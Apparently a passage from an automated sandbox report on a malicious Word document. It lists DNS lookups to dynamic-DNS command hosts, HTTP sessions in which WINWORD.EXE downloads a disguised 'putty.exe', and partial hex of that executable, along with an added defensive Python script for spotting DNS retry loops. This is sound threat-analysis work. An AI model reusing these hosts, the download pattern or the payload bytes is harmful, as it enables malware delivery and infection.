Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2021 10:59:54.123145103 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 10:59:54.167108059 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 10:59:57.598957062 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 10:59:57.642354965 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 10:59:58.563791037 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 10:59:58.599704981 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:28.612422943 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:28.667654037 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:29.524005890 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:29.556768894 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:29.557904005 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:29.590831041 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:55.130738020 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:55.262723923 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:55.263684988 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:55.298891068 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:00:55.299585104 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:00:55.334811926 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:03.769011974 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:03.900093079 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:03.945925951 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:03.978482962 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:03.992775917 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:04.025501013 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:10.201478958 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:10.237142086 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:15.511684895 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:15.549159050 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:15.592659950 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:15.629231930 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:15.686260939 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:15.724112988 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:26.042512894 CEST | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:26.079297066 CEST | 53 | 52496 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:26.163316965 CEST | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:26.191297054 CEST | 53 | 52496 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:31.131093025 CEST | 57564 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:31.158580065 CEST | 53 | 57564 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:36.336036921 CEST | 63009 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:36.371905088 CEST | 53 | 63009 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:41.617649078 CEST | 59319 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:41.650404930 CEST | 53 | 59319 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:52.811868906 CEST | 53070 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:52.841140032 CEST | 53 | 53070 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:01:58.229518890 CEST | 59770 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:01:58.264827013 CEST | 53 | 59770 | 8.8.8.8 | 192.168.2.22
Aug 2, 2021 11:02:03.448385954 CEST | 61523 | 53 | 192.168.2.22 | 8.8.8.8
Aug 2, 2021 11:02:03.577531099 CEST | 53 | 61523 | 8.8.8.8 | 192.168.2.22

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Aug 2, 2021 10:59:54.123145103 CEST | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:57.598957062 CEST | 192.168.2.22 | 8.8.8.8 | 0xe5d1 | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:58.563791037 CEST | 192.168.2.22 | 8.8.8.8 | 0x5ccc | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:28.612422943 CEST | 192.168.2.22 | 8.8.8.8 | 0xe21 | Standard query (0) | sdafsdffssffs.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.524005890 CEST | 192.168.2.22 | 8.8.8.8 | 0xe89a | Standard query (0) | hutyrtit.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.557904005 CEST | 192.168.2.22 | 8.8.8.8 | 0xe89a | Standard query (0) | hutyrtit.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.130738020 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.263684988 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.299585104 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.769011974 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.945925951 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.992775917 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:10.201478958 CEST | 192.168.2.22 | 8.8.8.8 | 0x12eb | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.511684895 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.592659950 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.686260939 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.042512894 CEST | 192.168.2.22 | 8.8.8.8 | 0x5b8f | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.163316965 CEST | 192.168.2.22 | 8.8.8.8 | 0x5b8f | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:31.131093025 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6e4 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:36.336036921 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ae6 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:41.617649078 CEST | 192.168.2.22 | 8.8.8.8 | 0xe8bf | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:52.811868906 CEST | 192.168.2.22 | 8.8.8.8 | 0xd6d2 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:58.229518890 CEST | 192.168.2.22 | 8.8.8.8 | 0x4853 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:02:03.448385954 CEST | 192.168.2.22 | 8.8.8.8 | 0xf096 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Aug 2, 2021 10:59:54.167108059 CEST | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:57.642354965 CEST | 8.8.8.8 | 192.168.2.22 | 0xe5d1 | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:58.599704981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5ccc | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:28.667654037 CEST | 8.8.8.8 | 192.168.2.22 | 0xe21 | No error (0) | sdafsdffssffs.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.556768894 CEST | 8.8.8.8 | 192.168.2.22 | 0xe89a | No error (0) | hutyrtit.ydns.eu |  | 203.159.80.165 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.590831041 CEST | 8.8.8.8 | 192.168.2.22 | 0xe89a | No error (0) | hutyrtit.ydns.eu |  | 203.159.80.165 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.262723923 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.298891068 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.334811926 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.900093079 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.978482962 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:04.025501013 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:10.237142086 CEST | 8.8.8.8 | 192.168.2.22 | 0x12eb | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.549159050 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.629231930 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.724112988 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.079297066 CEST | 8.8.8.8 | 192.168.2.22 | 0x5b8f | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.191297054 CEST | 8.8.8.8 | 192.168.2.22 | 0x5b8f | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:31.158580065 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6e4 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:36.371905088 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ae6 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:41.650404930 CEST | 8.8.8.8 | 192.168.2.22 | 0xe8bf | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:52.841140032 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6d2 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:58.264827013 CEST | 8.8.8.8 | 192.168.2.22 | 0x4853 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:02:03.577531099 CEST | 8.8.8.8 | 192.168.2.22 | 0xf096 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
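The two DNS tables above carry more than a list of indicators: every name resolves into 203.159.80.0/24, and hhjhtggfr.duckdns.org is looked up over and over with a fresh transaction ID every few seconds, the pattern a client stuck in a connect/retry loop produces. The script below is an added example for this report (it is not part of the Joe Sandbox output): it takes the query and answer rows copied from the tables, collapses retransmissions (same name, same transaction ID) into single lookups, flags names that are re-resolved at short median intervals, and pivots the queried names by the address they resolved to. The thresholds in find_reresolvers() are assumptions chosen for this capture.

```python
"""Re-resolution analysis over the DNS queries and answers recorded above.

Added example for this report, not part of the Joe Sandbox output. The rows
in DNS_QUERIES and DNS_ANSWERS are copied from the two tables above; the
thresholds in find_reresolvers() are assumptions chosen for this capture.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# (timestamp, transaction ID, queried name), copied from the DNS Queries table.
DNS_QUERIES = [
    ("Aug 2, 2021 10:59:54.123145103 CEST", 0x6029, "newhosteeeee.ydns.eu"),
    ("Aug 2, 2021 10:59:57.598957062 CEST", 0xe5d1, "newhosteeeee.ydns.eu"),
    ("Aug 2, 2021 10:59:58.563791037 CEST", 0x5ccc, "newhosteeeee.ydns.eu"),
    ("Aug 2, 2021 11:00:28.612422943 CEST", 0xe21, "sdafsdffssffs.ydns.eu"),
    ("Aug 2, 2021 11:00:29.524005890 CEST", 0xe89a, "hutyrtit.ydns.eu"),
    ("Aug 2, 2021 11:00:29.557904005 CEST", 0xe89a, "hutyrtit.ydns.eu"),
    ("Aug 2, 2021 11:00:55.130738020 CEST", 0x27e1, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:00:55.263684988 CEST", 0x27e1, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:00:55.299585104 CEST", 0x27e1, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:03.769011974 CEST", 0x566a, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:03.945925951 CEST", 0x566a, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:03.992775917 CEST", 0x566a, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:10.201478958 CEST", 0x12eb, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:15.511684895 CEST", 0xcc8c, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:15.592659950 CEST", 0xcc8c, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:15.686260939 CEST", 0xcc8c, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:26.042512894 CEST", 0x5b8f, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:26.163316965 CEST", 0x5b8f, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:31.131093025 CEST", 0xb6e4, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:36.336036921 CEST", 0x7ae6, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:41.617649078 CEST", 0xe8bf, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:52.811868906 CEST", 0xd6d2, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:01:58.229518890 CEST", 0x4853, "hhjhtggfr.duckdns.org"),
    ("Aug 2, 2021 11:02:03.448385954 CEST", 0xf096, "hhjhtggfr.duckdns.org"),
]

# queried name -> answer address, copied from the DNS Answers table.
DNS_ANSWERS = {
    "newhosteeeee.ydns.eu": "203.159.80.186",
    "sdafsdffssffs.ydns.eu": "203.159.80.186",
    "hutyrtit.ydns.eu": "203.159.80.165",
    "hhjhtggfr.duckdns.org": "203.159.80.186",
}

_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")
_EPOCH = datetime(1970, 1, 1)

def parse_ts(text):
    """Sandbox timestamps carry nanoseconds and strptime stops at microseconds,
    so parse the whole seconds and add the fraction by hand (naive, one zone)."""
    m = _TS.match(text)
    whole = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return (whole - _EPOCH).total_seconds() + int(m.group(2)) / 10 ** len(m.group(2))

def lookups_by_name(queries):
    """One lookup per (name, transaction ID), timed at its first packet, so
    retransmissions of the same query are not counted as new lookups."""
    first = {}
    for ts, txid, qname in queries:
        t = parse_ts(ts)
        first[(qname, txid)] = min(t, first.get((qname, txid), t))
    out = defaultdict(list)
    for (qname, _), t in first.items():
        out[qname].append(t)
    return {q: sorted(ts) for q, ts in out.items()}

def find_reresolvers(queries, min_lookups=5, max_median_gap=30.0):
    """Names resolved again and again at short intervals. A client that
    re-resolves the same server every few seconds is in a connect/retry loop,
    not reacting to user activity. Thresholds are assumptions for this capture."""
    hits = {}
    for qname, times in lookups_by_name(queries).items():
        if len(times) < min_lookups:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        if median(gaps) <= max_median_gap:
            hits[qname] = {"lookups": len(times),
                           "median_gap_s": round(median(gaps), 3),
                           "span_s": round(times[-1] - times[0], 3)}
    return hits

def pivot_by_address(answers):
    """Group queried names by the address they resolved to."""
    pivot = defaultdict(list)
    for qname, addr in answers.items():
        pivot[addr].append(qname)
    return dict(pivot)

if __name__ == "__main__":
    for name, stats in find_reresolvers(DNS_QUERIES).items():
        print(name, stats)
    for addr, names in pivot_by_address(DNS_ANSWERS).items():
        print(addr, ", ".join(names))
```

On this capture the only name that trips find_reresolvers() is hhjhtggfr.duckdns.org: 11 distinct lookups in about 68 seconds with a median gap of roughly 5.4 s. The three lookups of newhosteeeee.ydns.eu line up with the three separate GET /putty.exe sessions WINWORD.EXE made, and hutyrtit.ydns.eu collapses to a single lookup because its second packet reuses transaction ID 0xe89a.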

                                HTTP Request Dependency Graph

                                • newhosteeeee.ydns.eu
                                • hutyrtit.ydns.eu

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.22 | 49165 | 203.159.80.186 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:54.220050097 CEST | 0 | OUT | GET /putty.exe HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:54.251251936 CEST | 2 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:54 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.22 | 49166 | 203.159.80.186 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:57.762746096 CEST | 778 | OUT | GET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:57.833343983 CEST | 779 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 